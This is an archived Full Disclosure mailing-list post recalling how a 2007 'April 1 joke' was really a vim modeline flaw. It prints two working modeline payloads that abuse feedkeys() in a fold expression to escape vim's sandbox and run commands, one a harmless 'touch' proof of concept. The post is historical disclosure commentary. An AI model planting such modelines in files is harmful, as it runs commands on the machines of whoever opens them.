Full Disclosure mailing list archives

By Date By Thread So, so you think you can tell April 1 joke from a 0day? From: Georgi Guninski <guninski () guninski com>

Date: Sun, 1 Apr 2012 17:26:52 +0300

So, so you think you can tell April 1 joke from a 0day? On Sun, 1 Apr 2007 03:26:30 -0400 (EDT) someone posted a message to fd with subject "April 1 joke" [1] The body of the message appeared to me as not obfuscated vim 0day. vim: foldmethod=expr:foldexpr=feedkeys("\\<esc>\\x3a%!cat\\x20-n\\<CR>\\<esc>\\x 3a%s/./\:)/g\\<CR>\\<esc>\\x3aq!\\<CR>"): The thread had 4 emails. On 2007-04-26 21:35 [2] on vim-dev: today somebody came to #vim, and pasted some modeline (containig joke or such). He muttered something about not knowing what that means and left before long. But (!) what I noticed is that feedkeys() was used as part of foldexpression and it turned out that feedkeys() is allowed in sandbox, which means malicious file can run arbitrary command via modeline like this: vim: fdm=expr fde=feedkeys("\\:!touch\ phantom_was_here\\<cr>") Redhat's bug is at [3]. Appears to me the CVE assigning monkeys and Secunia didn't notice the 0day. So, so you think you can tell April 1 joke from a 0day? [1]: http://seclists.org/fulldisclosure/2007/Apr/0 [2]: http://marc.info/?l=vim-dev&m=117762581821298 [3]: https://bugzilla.redhat.com/show_bug.cgi?id=238259 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ By Date By Thread Current thread: So, so you think you can tell April 1 joke from a 0day? Georgi Guninski (Apr 01)